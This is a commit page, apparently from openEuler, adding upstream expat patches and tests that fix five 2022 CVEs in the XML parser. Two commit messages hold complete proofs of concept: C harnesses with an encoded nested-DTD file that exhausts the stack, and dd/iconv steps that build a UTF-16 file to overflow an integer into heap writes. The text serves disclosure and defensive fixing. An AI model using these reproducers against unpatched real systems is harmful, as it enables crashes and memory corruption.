!34 Fix CVE-2022-25235 CVE-2022-25236 CVE-2022-25313 CVE-2022-25314 CVE-2022-25315

From: @yang_zhuang_zhuang 
Reviewed-by: @xiezhipeng1 
Signed-off-by: @xiezhipeng1
This commit is contained in:
openeuler-ci-bot 2022-02-28 01:11:00 +00:00 committed by Gitee
commit 570b409ec8
No known key found for this signature in database
GPG Key ID: 173E9B9CA92EEF8F
10 changed files with 930 additions and 1 deletions

View File

@ -0,0 +1,42 @@
From 3f0a0cb644438d4d8e3294cd0b1245d0edb0c6c6 Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Tue, 8 Feb 2022 04:32:20 +0100
Subject: [PATCH] lib: Add missing validation of encoding (CVE-2022-25235)
---
lib/xmltok_impl.c | 8 ++++++--
1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/lib/xmltok_impl.c b/lib/xmltok_impl.c
index 0430591b4..64a3b2c15 100644
--- a/lib/xmltok_impl.c
+++ b/lib/xmltok_impl.c
@@ -69,7 +69,7 @@
case BT_LEAD##n: \
if (end - ptr < n) \
return XML_TOK_PARTIAL_CHAR; \
- if (! IS_NAME_CHAR(enc, ptr, n)) { \
+ if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NAME_CHAR(enc, ptr, n)) { \
*nextTokPtr = ptr; \
return XML_TOK_INVALID; \
} \
@@ -98,7 +98,7 @@
case BT_LEAD##n: \
if (end - ptr < n) \
return XML_TOK_PARTIAL_CHAR; \
- if (! IS_NMSTRT_CHAR(enc, ptr, n)) { \
+ if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NMSTRT_CHAR(enc, ptr, n)) { \
*nextTokPtr = ptr; \
return XML_TOK_INVALID; \
} \
@@ -1142,6 +1142,10 @@ PREFIX(prologTok)(const ENCODING *enc, const char *ptr, const char *end,
case BT_LEAD##n: \
if (end - ptr < n) \
return XML_TOK_PARTIAL_CHAR; \
+ if (IS_INVALID_CHAR(enc, ptr, n)) { \
+ *nextTokPtr = ptr; \
+ return XML_TOK_INVALID; \
+ } \
if (IS_NMSTRT_CHAR(enc, ptr, n)) { \
ptr += n; \
tok = XML_TOK_NAME; \

View File

@ -0,0 +1,32 @@
From a2fe525e660badd64b6c557c2b1ec26ddc07f6e4 Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Sat, 12 Feb 2022 01:09:29 +0100
Subject: [PATCH] lib: Protect against malicious namespace declarations
(CVE-2022-25236)
---
lib/xmlparse.c | 11 +++++++++++
1 file changed, 11 insertions(+)
diff --git a/lib/xmlparse.c b/lib/xmlparse.c
index c768f856..a3aef88c 100644
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -3754,6 +3754,17 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
if (! mustBeXML && isXMLNS
&& (len > xmlnsLen || uri[len] != xmlnsNamespace[len]))
isXMLNS = XML_FALSE;
+
+ // NOTE: While Expat does not validate namespace URIs against RFC 3986,
+ // we have to at least make sure that the XML processor on top of
+ // Expat (that is splitting tag names by namespace separator into
+ // 2- or 3-tuples (uri-local or uri-local-prefix)) cannot be confused
+ // by an attacker putting additional namespace separator characters
+ // into namespace declarations. That would be ambiguous and not to
+ // be expected.
+ if (parser->m_ns && (uri[len] == parser->m_namespaceSeparator)) {
+ return XML_ERROR_SYNTAX;
+ }
}
isXML = isXML && len == xmlLen;
isXMLNS = isXMLNS && len == xmlnsLen;

View File

@ -0,0 +1,222 @@
From 9b4ce651b26557f16103c3a366c91934ecd439ab Mon Sep 17 00:00:00 2001
From: Samanta Navarro <ferivoz@riseup.net>
Date: Tue, 15 Feb 2022 11:54:29 +0000
Subject: [PATCH] Prevent stack exhaustion in build_model
It is possible to trigger stack exhaustion in build_model function if
depth of nested children in DTD element is large enough. This happens
because build_node is a recursively called function within build_model.
The code has been adjusted to run iteratively. It uses the already
allocated heap space as temporary stack (growing from top to bottom).
Output is identical to recursive version. No new fields in data
structures were added, i.e. it keeps full API and ABI compatibility.
Instead the numchildren variable is used to temporarily keep the
index of items (uint vs int).
Documentation and readability improvements kindly added by Sebastian.
Proof of Concept:
1. Compile poc binary which parses XML file line by line
```
cat > poc.c << EOF
#include <err.h>
#include <expat.h>
#include <stdio.h>
XML_Parser parser;
static void XMLCALL
dummy_element_decl_handler(void *userData, const XML_Char *name,
XML_Content *model) {
XML_FreeContentModel(parser, model);
}
int main(int argc, char *argv[]) {
FILE *fp;
char *p = NULL;
size_t s = 0;
ssize_t l;
if (argc != 2)
errx(1, "usage: poc poc.xml");
if ((parser = XML_ParserCreate(NULL)) == NULL)
errx(1, "XML_ParserCreate");
XML_SetElementDeclHandler(parser, dummy_element_decl_handler);
if ((fp = fopen(argv[1], "r")) == NULL)
err(1, "fopen");
while ((l = getline(&p, &s, fp)) > 0)
if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK)
errx(1, "XML_Parse");
XML_ParserFree(parser);
free(p);
fclose(fp);
return 0;
}
EOF
cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c
```
2. Create XML file with a lot of nested groups in DTD element
```
cat > poc.xml.zst.b64 << EOF
KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA
ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC
ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ==
EOF
base64 -d poc.xml.zst.b64 | zstd -d > poc.xml
```
3. Run Proof of Concept
```
./poc poc.xml
```
Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
---
lib/xmlparse.c | 116 +++++++++++++++++++++++++++++--------------
1 file changed, 79 insertions(+), 37 deletions(-)
diff --git a/lib/xmlparse.c b/lib/xmlparse.c
index 4b43e613..594cf12c 100644
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -7317,44 +7317,15 @@ nextScaffoldPart(XML_Parser parser) {
return next;
}
-static void
-build_node(XML_Parser parser, int src_node, XML_Content *dest,
- XML_Content **contpos, XML_Char **strpos) {
- DTD *const dtd = parser->m_dtd; /* save one level of indirection */
- dest->type = dtd->scaffold[src_node].type;
- dest->quant = dtd->scaffold[src_node].quant;
- if (dest->type == XML_CTYPE_NAME) {
- const XML_Char *src;
- dest->name = *strpos;
- src = dtd->scaffold[src_node].name;
- for (;;) {
- *(*strpos)++ = *src;
- if (! *src)
- break;
- src++;
- }
- dest->numchildren = 0;
- dest->children = NULL;
- } else {
- unsigned int i;
- int cn;
- dest->numchildren = dtd->scaffold[src_node].childcnt;
- dest->children = *contpos;
- *contpos += dest->numchildren;
- for (i = 0, cn = dtd->scaffold[src_node].firstchild; i < dest->numchildren;
- i++, cn = dtd->scaffold[cn].nextsib) {
- build_node(parser, cn, &(dest->children[i]), contpos, strpos);
- }
- dest->name = NULL;
- }
-}
-
static XML_Content *
build_model(XML_Parser parser) {
+ /* Function build_model transforms the existing parser->m_dtd->scaffold
+ * array of CONTENT_SCAFFOLD tree nodes into a new array of
+ * XML_Content tree nodes followed by a gapless list of zero-terminated
+ * strings. */
DTD *const dtd = parser->m_dtd; /* save one level of indirection */
XML_Content *ret;
- XML_Content *cpos;
- XML_Char *str;
+ XML_Char *str; /* the current string writing location */
/* Detect and prevent integer overflow.
* The preprocessor guard addresses the "always false" warning
@@ -7380,10 +7351,81 @@ build_model(XML_Parser parser) {
if (! ret)
return NULL;
- str = (XML_Char *)(&ret[dtd->scaffCount]);
- cpos = &ret[1];
+ /* What follows is an iterative implementation (of what was previously done
+ * recursively in a dedicated function called "build_node". The old recursive
+ * build_node could be forced into stack exhaustion from input as small as a
+ * few megabyte, and so that was a security issue. Hence, a function call
+ * stack is avoided now by resolving recursion.)
+ *
+ * The iterative approach works as follows:
+ *
+ * - We use space in the target array for building a temporary stack structure
+ * while that space is still unused.
+ * The stack grows from the array's end downwards and the "actual data"
+ * grows from the start upwards, sequentially.
+ * (Because stack grows downwards, pushing onto the stack is a decrement
+ * while popping off the stack is an increment.)
+ *
+ * - A stack element appears as a regular XML_Content node on the outside,
+ * but only uses a single field -- numchildren -- to store the source
+ * tree node array index. These are the breadcrumbs leading the way back
+ * during pre-order (node first) depth-first traversal.
+ *
+ * - The reason we know the stack will never grow into (or overlap with)
+ * the area with data of value at the start of the array is because
+ * the overall number of elements to process matches the size of the array,
+ * and the sum of fully processed nodes and yet-to-be processed nodes
+ * on the stack, cannot be more than the total number of nodes.
+ * It is possible for the top of the stack and the about-to-write node
+ * to meet, but that is safe because we get the source index out
+ * before doing any writes on that node.
+ */
+ XML_Content *dest = ret; /* tree node writing location, moves upwards */
+ XML_Content *const destLimit = &ret[dtd->scaffCount];
+ XML_Content *const stackBottom = &ret[dtd->scaffCount];
+ XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
+ str = (XML_Char *)&ret[dtd->scaffCount];
+
+ /* Push source tree root node index onto the stack */
+ (--stackTop)->numchildren = 0;
+
+ for (; dest < destLimit; dest++) {
+ /* Pop source tree node index off the stack */
+ const int src_node = (int)(stackTop++)->numchildren;
+
+ /* Convert item */
+ dest->type = dtd->scaffold[src_node].type;
+ dest->quant = dtd->scaffold[src_node].quant;
+ if (dest->type == XML_CTYPE_NAME) {
+ const XML_Char *src;
+ dest->name = str;
+ src = dtd->scaffold[src_node].name;
+ for (;;) {
+ *str++ = *src;
+ if (! *src)
+ break;
+ src++;
+ }
+ dest->numchildren = 0;
+ dest->children = NULL;
+ } else {
+ unsigned int i;
+ int cn;
+ dest->name = NULL;
+ dest->numchildren = dtd->scaffold[src_node].childcnt;
+ dest->children = &dest[1];
+
+ /* Push children to the stack
+ * in a way where the first child ends up at the top of the
+ * (downwards growing) stack, in order to be processed first. */
+ stackTop -= dest->numchildren;
+ for (i = 0, cn = dtd->scaffold[src_node].firstchild;
+ i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
+ (stackTop + i)->numchildren = (unsigned int)cn;
+ }
+ }
+ }
- build_node(parser, 0, ret, &cpos, &str);
return ret;
}

View File

@ -0,0 +1,24 @@
From efcb347440ade24b9f1054671e6bd05e60b4cafd Mon Sep 17 00:00:00 2001
From: Samanta Navarro <ferivoz@riseup.net>
Date: Tue, 15 Feb 2022 11:56:57 +0000
Subject: [PATCH] Prevent integer overflow in copyString
The copyString function is only used for encoding string supplied by
the library user.
---
lib/xmlparse.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/xmlparse.c b/lib/xmlparse.c
index 4b43e613..a39377c2 100644
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -7412,7 +7412,7 @@ getElementType(XML_Parser parser, const ENCODING *enc, const char *ptr,
static XML_Char *
copyString(const XML_Char *s, const XML_Memory_Handling_Suite *memsuite) {
- int charsRequired = 0;
+ size_t charsRequired = 0;
XML_Char *result;
/* First determine how long the string is */

View File

@ -0,0 +1,138 @@
From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
From: Samanta Navarro <ferivoz@riseup.net>
Date: Tue, 15 Feb 2022 11:55:46 +0000
Subject: [PATCH] Prevent integer overflow in storeRawNames
It is possible to use an integer overflow in storeRawNames for out of
boundary heap writes. Default configuration is affected. If compiled
with XML_UNICODE then the attack does not work. Compiling with
-fsanitize=address confirms the following proof of concept.
The problem can be exploited by abusing the m_buffer expansion logic.
Even though the initial size of m_buffer is a power of two, eventually
it can end up a little bit lower, thus allowing allocations very close
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
names can be parsed which are almost INT_MAX in size.
Unfortunately (from an attacker point of view) INT_MAX/2 is also a
limitation in string pools. Having a tag name of INT_MAX/2 characters
or more is not possible.
Expat can convert between different encodings. UTF-16 documents which
contain only ASCII representable characters are twice as large as their
ASCII encoded counter-parts.
The proof of concept works by taking these three considerations into
account:
1. Move the m_buffer size slightly below a power of two by having a
short root node <a>. This allows the m_buffer to grow very close
to INT_MAX.
2. The string pooling forbids tag names longer than or equal to
INT_MAX/2, so keep the attack tag name smaller than that.
3. To be able to still overflow INT_MAX even though the name is
limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
which only contains ASCII characters. UTF-16 always stores two
bytes per character while the tag name is converted to using only
one. Our attack node byte count must be a bit higher than
2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
in sum can overflow INT_MAX.
Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
without running into INT_MAX boundary check. The string pooling is
able to store INT_MAX/3 as tag name because the amount is below
INT_MAX/2 limitation. And creating the sum of both eventually overflows
in storeRawNames.
Proof of Concept:
1. Compile expat with -fsanitize=address.
2. Create Proof of Concept binary which iterates through input
file 16 MB at once for better performance and easier integer
calculations:
```
cat > poc.c << EOF
#include <err.h>
#include <expat.h>
#include <stdlib.h>
#include <stdio.h>
#define CHUNK (16 * 1024 * 1024)
int main(int argc, char *argv[]) {
XML_Parser parser;
FILE *fp;
char *buf;
int i;
if (argc != 2)
errx(1, "usage: poc file.xml");
if ((parser = XML_ParserCreate(NULL)) == NULL)
errx(1, "failed to create expat parser");
if ((fp = fopen(argv[1], "r")) == NULL) {
XML_ParserFree(parser);
err(1, "failed to open file");
}
if ((buf = malloc(CHUNK)) == NULL) {
fclose(fp);
XML_ParserFree(parser);
err(1, "failed to allocate buffer");
}
i = 0;
while (fread(buf, CHUNK, 1, fp) == 1) {
printf("iteration %d: XML_Parse returns %d\n", ++i,
XML_Parse(parser, buf, CHUNK, XML_FALSE));
}
free(buf);
fclose(fp);
XML_ParserFree(parser);
return 0;
}
EOF
gcc -fsanitize=address -lexpat -o poc poc.c
```
3. Construct specially prepared UTF-16 XML file:
```
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
```
4. Run proof of concept:
```
./poc poc-utf16.xml
```
---
lib/xmlparse.c | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/lib/xmlparse.c b/lib/xmlparse.c
index 4b43e613..f34d6ab5 100644
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) {
while (tag) {
int bufSize;
int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
+ size_t rawNameLen;
char *rawNameBuf = tag->buf + nameLen;
/* Stop if already stored. Since m_tagStack is a stack, we can stop
at the first entry that has already been copied; everything
@@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) {
/* For re-use purposes we need to ensure that the
size of tag->buf is a multiple of sizeof(XML_Char).
*/
- bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
+ rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
+ /* Detect and prevent integer overflow. */
+ if (rawNameLen > (size_t)INT_MAX - nameLen)
+ return XML_FALSE;
+ bufSize = nameLen + (int)rawNameLen;
if (bufSize > tag->bufEnd - tag->buf) {
char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
if (temp == NULL)

View File

@ -0,0 +1,134 @@
From b12f34fe32821a69dc12ff9a021daca0856de238 Mon Sep 17 00:00:00 2001
From: Samanta Navarro <ferivoz@riseup.net>
Date: Sat, 19 Feb 2022 23:59:25 +0000
Subject: [PATCH] Fix build_model regression.
The iterative approach in build_model failed to fill children arrays
correctly. A preorder traversal is not required and turned out to be the
culprit. Use an easier algorithm:
Add nodes from scaffold tree starting at index 0 (root) to the target
array whenever children are encountered. This ensures that children
are adjacent to each other. This complies with the recursive version.
Store only the scaffold index in numchildren field to prevent a direct
processing of these children, which would require a recursive solution.
This allows the algorithm to iterate through the target array from start
to end without jumping back and forth, converting on the fly.
Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
---
lib/xmlparse.c | 79 +++++++++++++++++++++++++++++++---------------------
1 file changed, 47 insertions(+), 32 deletions(-)
diff --git a/lib/xmlparse.c b/lib/xmlparse.c
index c479a25..84885b5 100644
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -7373,39 +7373,58 @@ build_model(XML_Parser parser) {
*
* The iterative approach works as follows:
*
- * - We use space in the target array for building a temporary stack structure
- * while that space is still unused.
- * The stack grows from the array's end downwards and the "actual data"
- * grows from the start upwards, sequentially.
- * (Because stack grows downwards, pushing onto the stack is a decrement
- * while popping off the stack is an increment.)
+ * - We have two writing pointers, both walking up the result array; one does
+ * the work, the other creates "jobs" for its colleague to do, and leads
+ * the way:
*
- * - A stack element appears as a regular XML_Content node on the outside,
- * but only uses a single field -- numchildren -- to store the source
- * tree node array index. These are the breadcrumbs leading the way back
- * during pre-order (node first) depth-first traversal.
+ * - The faster one, pointer jobDest, always leads and writes "what job
+ * to do" by the other, once they reach that place in the
+ * array: leader "jobDest" stores the source node array index (relative
+ * to array dtd->scaffold) in field "numchildren".
*
- * - The reason we know the stack will never grow into (or overlap with)
- * the area with data of value at the start of the array is because
- * the overall number of elements to process matches the size of the array,
- * and the sum of fully processed nodes and yet-to-be processed nodes
- * on the stack, cannot be more than the total number of nodes.
- * It is possible for the top of the stack and the about-to-write node
- * to meet, but that is safe because we get the source index out
- * before doing any writes on that node.
+ * - The slower one, pointer dest, looks at the value stored in the
+ * "numchildren" field (which actually holds a source node array index
+ * at that time) and puts the real data from dtd->scaffold in.
+ *
+ * - Before the loop starts, jobDest writes source array index 0
+ * (where the root node is located) so that dest will have something to do
+ * when it starts operation.
+ *
+ * - Whenever nodes with children are encountered, jobDest appends
+ * them as new jobs, in order. As a result, tree node siblings are
+ * adjacent in the resulting array, for example:
+ *
+ * [0] root, has two children
+ * [1] first child of 0, has three children
+ * [3] first child of 1, does not have children
+ * [4] second child of 1, does not have children
+ * [5] third child of 1, does not have children
+ * [2] second child of 0, does not have children
+ *
+ * Or (the same data) presented in flat array view:
+ *
+ * [0] root, has two children
+ *
+ * [1] first child of 0, has three children
+ * [2] second child of 0, does not have children
+ *
+ * [3] first child of 1, does not have children
+ * [4] second child of 1, does not have children
+ * [5] third child of 1, does not have children
+ *
+ * - The algorithm repeats until all target array indices have been processed.
*/
XML_Content *dest = ret; /* tree node writing location, moves upwards */
XML_Content *const destLimit = &ret[dtd->scaffCount];
- XML_Content *const stackBottom = &ret[dtd->scaffCount];
- XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
+ XML_Content *jobDest = ret; /* next free writing location in target array */
str = (XML_Char *)&ret[dtd->scaffCount];
- /* Push source tree root node index onto the stack */
- (--stackTop)->numchildren = 0;
+ /* Add the starting job, the root node (index 0) of the source tree */
+ (jobDest++)->numchildren = 0;
for (; dest < destLimit; dest++) {
- /* Pop source tree node index off the stack */
- const int src_node = (int)(stackTop++)->numchildren;
+ /* Retrieve source tree array index from job storage */
+ const int src_node = (int)dest->numchildren;
/* Convert item */
dest->type = dtd->scaffold[src_node].type;
@@ -7427,16 +7446,12 @@ build_model(XML_Parser parser) {
int cn;
dest->name = NULL;
dest->numchildren = dtd->scaffold[src_node].childcnt;
- dest->children = &dest[1];
+ dest->children = jobDest;
- /* Push children to the stack
- * in a way where the first child ends up at the top of the
- * (downwards growing) stack, in order to be processed first. */
- stackTop -= dest->numchildren;
+ /* Append scaffold indices of children to array */
for (i = 0, cn = dtd->scaffold[src_node].firstchild;
- i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
- (stackTop + i)->numchildren = (unsigned int)cn;
- }
+ i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib)
+ (jobDest++)->numchildren = (unsigned int)cn;
}
}
--
1.8.3.1

View File

@ -0,0 +1,60 @@
From 2de077423fb22750ebea599677d523b53cb93b1d Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Sat, 12 Feb 2022 00:51:43 +0100
Subject: [PATCH] tests: Cover CVE-2022-25236
---
tests/runtests.c | 30 ++++++++++++++++++++++++++++++
1 file changed, 30 insertions(+)
diff --git a/tests/runtests.c b/tests/runtests.c
index d07203f..bc5344b 100644
--- a/tests/runtests.c
+++ b/tests/runtests.c
@@ -7220,6 +7220,35 @@ START_TEST(test_ns_double_colon_doctype) {
}
END_TEST
+START_TEST(test_ns_separator_in_uri) {
+ struct test_case {
+ enum XML_Status expectedStatus;
+ const char *doc;
+ };
+ struct test_case cases[] = {
+ {XML_STATUS_OK, "<doc xmlns='one_two' />"},
+ {XML_STATUS_ERROR, "<doc xmlns='one&#x0A;two' />"},
+ };
+
+ size_t i = 0;
+ size_t failCount = 0;
+ for (; i < sizeof(cases) / sizeof(cases[0]); i++) {
+ XML_Parser parser = XML_ParserCreateNS(NULL, '\n');
+ XML_SetElementHandler(parser, dummy_start_element, dummy_end_element);
+ if (XML_Parse(parser, cases[i].doc, (int)strlen(cases[i].doc),
+ /*isFinal*/ XML_TRUE)
+ != cases[i].expectedStatus) {
+ failCount++;
+ }
+ XML_ParserFree(parser);
+ }
+
+ if (failCount) {
+ fail("Namespace separator handling is broken");
+ }
+}
+END_TEST
+
/* Control variable; the number of times duff_allocator() will successfully
* allocate */
#define ALLOC_ALWAYS_SUCCEED (-1)
@@ -11905,6 +11934,7 @@ make_suite(void) {
tcase_add_test(tc_namespace, test_ns_utf16_doctype);
tcase_add_test(tc_namespace, test_ns_invalid_doctype);
tcase_add_test(tc_namespace, test_ns_double_colon_doctype);
+ tcase_add_test(tc_namespace, test_ns_separator_in_uri);
suite_add_tcase(s, tc_misc);
tcase_add_checked_fixture(tc_misc, NULL, basic_teardown);
--
1.8.3.1

View File

@ -0,0 +1,154 @@
From 6a5510bc6b7efe743356296724e0b38300f05379 Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Tue, 8 Feb 2022 04:06:21 +0100
Subject: [PATCH] tests: Cover missing validation of encoding
(CVE-2022-25235)
---
tests/runtests.c | 109 +++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 109 insertions(+)
diff --git a/tests/runtests.c b/tests/runtests.c
index bc5344b..9b155b8 100644
--- a/tests/runtests.c
+++ b/tests/runtests.c
@@ -5998,6 +5998,105 @@ START_TEST(test_utf8_in_cdata_section_2) {
}
END_TEST
+START_TEST(test_utf8_in_start_tags) {
+ struct test_case {
+ bool goodName;
+ bool goodNameStart;
+ const char *tagName;
+ };
+
+ // The idea with the tests below is this:
+ // We want to cover 1-, 2- and 3-byte sequences, 4-byte sequences
+ // go to isNever and are hence not a concern.
+ //
+ // We start with a character that is a valid name character
+ // (or even name-start character, see XML 1.0r4 spec) and then we flip
+ // single bits at places where (1) the result leaves the UTF-8 encoding space
+ // and (2) we stay in the same n-byte sequence family.
+ //
+ // The flipped bits are highlighted in angle brackets in comments,
+ // e.g. "[<1>011 1001]" means we had [0011 1001] but we now flipped
+ // the most significant bit to 1 to leave UTF-8 encoding space.
+ struct test_case cases[] = {
+ // 1-byte UTF-8: [0xxx xxxx]
+ {true, true, "\x3A"}, // [0011 1010] = ASCII colon ':'
+ {false, false, "\xBA"}, // [<1>011 1010]
+ {true, false, "\x39"}, // [0011 1001] = ASCII nine '9'
+ {false, false, "\xB9"}, // [<1>011 1001]
+
+ // 2-byte UTF-8: [110x xxxx] [10xx xxxx]
+ {true, true, "\xDB\xA5"}, // [1101 1011] [1010 0101] =
+ // Arabic small waw U+06E5
+ {false, false, "\x9B\xA5"}, // [1<0>01 1011] [1010 0101]
+ {false, false, "\xDB\x25"}, // [1101 1011] [<0>010 0101]
+ {false, false, "\xDB\xE5"}, // [1101 1011] [1<1>10 0101]
+ {true, false, "\xCC\x81"}, // [1100 1100] [1000 0001] =
+ // combining char U+0301
+ {false, false, "\x8C\x81"}, // [1<0>00 1100] [1000 0001]
+ {false, false, "\xCC\x01"}, // [1100 1100] [<0>000 0001]
+ {false, false, "\xCC\xC1"}, // [1100 1100] [1<1>00 0001]
+
+ // 3-byte UTF-8: [1110 xxxx] [10xx xxxx] [10xxxxxx]
+ {true, true, "\xE0\xA4\x85"}, // [1110 0000] [1010 0100] [1000 0101] =
+ // Devanagari Letter A U+0905
+ {false, false, "\xA0\xA4\x85"}, // [1<0>10 0000] [1010 0100] [1000 0101]
+ {false, false, "\xE0\x24\x85"}, // [1110 0000] [<0>010 0100] [1000 0101]
+ {false, false, "\xE0\xE4\x85"}, // [1110 0000] [1<1>10 0100] [1000 0101]
+ {false, false, "\xE0\xA4\x05"}, // [1110 0000] [1010 0100] [<0>000 0101]
+ {false, false, "\xE0\xA4\xC5"}, // [1110 0000] [1010 0100] [1<1>00 0101]
+ {true, false, "\xE0\xA4\x81"}, // [1110 0000] [1010 0100] [1000 0001] =
+ // combining char U+0901
+ {false, false, "\xA0\xA4\x81"}, // [1<0>10 0000] [1010 0100] [1000 0001]
+ {false, false, "\xE0\x24\x81"}, // [1110 0000] [<0>010 0100] [1000 0001]
+ {false, false, "\xE0\xE4\x81"}, // [1110 0000] [1<1>10 0100] [1000 0001]
+ {false, false, "\xE0\xA4\x01"}, // [1110 0000] [1010 0100] [<0>000 0001]
+ {false, false, "\xE0\xA4\xC1"}, // [1110 0000] [1010 0100] [1<1>00 0001]
+ };
+ const bool atNameStart[] = {true, false};
+
+ size_t i = 0;
+ char doc[1024];
+ size_t failCount = 0;
+
+ for (; i < sizeof(cases) / sizeof(cases[0]); i++) {
+ size_t j = 0;
+ for (; j < sizeof(atNameStart) / sizeof(atNameStart[0]); j++) {
+ const bool expectedSuccess
+ = atNameStart[j] ? cases[i].goodNameStart : cases[i].goodName;
+ sprintf(doc, "<%s%s><!--", atNameStart[j] ? "" : "a", cases[i].tagName);
+ XML_Parser parser = XML_ParserCreate(NULL);
+
+ const enum XML_Status status
+ = XML_Parse(parser, doc, (int)strlen(doc), /*isFinal=*/XML_FALSE);
+
+ bool success = true;
+ if ((status == XML_STATUS_OK) != expectedSuccess) {
+ success = false;
+ }
+ if ((status == XML_STATUS_ERROR)
+ && (XML_GetErrorCode(parser) != XML_ERROR_INVALID_TOKEN)) {
+ success = false;
+ }
+
+ if (! success) {
+ fprintf(
+ stderr,
+ "FAIL case %2u (%sat name start, %u-byte sequence, error code %d)\n",
+ (unsigned)i + 1u, atNameStart[j] ? " " : "not ",
+ (unsigned)strlen(cases[i].tagName), XML_GetErrorCode(parser));
+ failCount++;
+ }
+
+ XML_ParserFree(parser);
+ }
+ }
+
+ if (failCount > 0) {
+ fail("UTF-8 regression detected");
+ }
+}
+END_TEST
+
/* Test trailing spaces in elements are accepted */
static void XMLCALL
record_element_end_handler(void *userData, const XML_Char *name) {
@@ -6175,6 +6274,14 @@ START_TEST(test_bad_doctype) {
}
END_TEST
+START_TEST(test_bad_doctype_utf8) {
+ const char *text = "<!DOCTYPE \xDB\x25"
+ "doc><doc/>"; // [1101 1011] [<0>010 0101]
+ expect_failure(text, XML_ERROR_INVALID_TOKEN,
+ "Invalid UTF-8 in DOCTYPE not faulted");
+}
+END_TEST
+
START_TEST(test_bad_doctype_utf16) {
const char text[] =
/* <!DOCTYPE doc [ \x06f2 ]><doc/>
@@ -11870,6 +11977,7 @@ make_suite(void) {
tcase_add_test(tc_basic, test_ext_entity_utf8_non_bom);
tcase_add_test(tc_basic, test_utf8_in_cdata_section);
tcase_add_test(tc_basic, test_utf8_in_cdata_section_2);
+ tcase_add_test(tc_basic, test_utf8_in_start_tags);
tcase_add_test(tc_basic, test_trailing_spaces_in_elements);
tcase_add_test(tc_basic, test_utf16_attribute);
tcase_add_test(tc_basic, test_utf16_second_attr);
@@ -11878,6 +11986,7 @@ make_suite(void) {
tcase_add_test(tc_basic, test_bad_attr_desc_keyword);
tcase_add_test(tc_basic, test_bad_attr_desc_keyword_utf16);
tcase_add_test(tc_basic, test_bad_doctype);
+ tcase_add_test(tc_basic, test_bad_doctype_utf8);
tcase_add_test(tc_basic, test_bad_doctype_utf16);
tcase_add_test(tc_basic, test_bad_doctype_plus);
tcase_add_test(tc_basic, test_bad_doctype_star);
--
1.8.3.1

View File

@ -0,0 +1,108 @@
From 154e565f6ef329c9ec97e6534c411ddde0b320c8 Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Sun, 20 Feb 2022 03:26:57 +0100
Subject: [PATCH] tests: Protect against nested element declaration
model regressions
---
tests/runtests.c | 77 ++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 77 insertions(+)
diff --git a/tests/runtests.c b/tests/runtests.c
index 2cd4acb..e28670d 100644
--- a/tests/runtests.c
+++ b/tests/runtests.c
@@ -2664,6 +2664,82 @@ START_TEST(test_dtd_elements) {
}
END_TEST
+static void XMLCALL
+element_decl_check_model(void *userData, const XML_Char *name,
+ XML_Content *model) {
+ UNUSED_P(userData);
+ uint32_t errorFlags = 0;
+
+ /* Expected model array structure is this:
+ * [0] (type 6, quant 0)
+ * [1] (type 5, quant 0)
+ * [3] (type 4, quant 0, name "bar")
+ * [4] (type 4, quant 0, name "foo")
+ * [5] (type 4, quant 3, name "xyz")
+ * [2] (type 4, quant 2, name "zebra")
+ */
+ errorFlags |= ((xcstrcmp(name, XCS("junk")) == 0) ? 0 : (1u << 0));
+ errorFlags |= ((model != NULL) ? 0 : (1u << 1));
+
+ errorFlags |= ((model[0].type == XML_CTYPE_SEQ) ? 0 : (1u << 2));
+ errorFlags |= ((model[0].quant == XML_CQUANT_NONE) ? 0 : (1u << 3));
+ errorFlags |= ((model[0].numchildren == 2) ? 0 : (1u << 4));
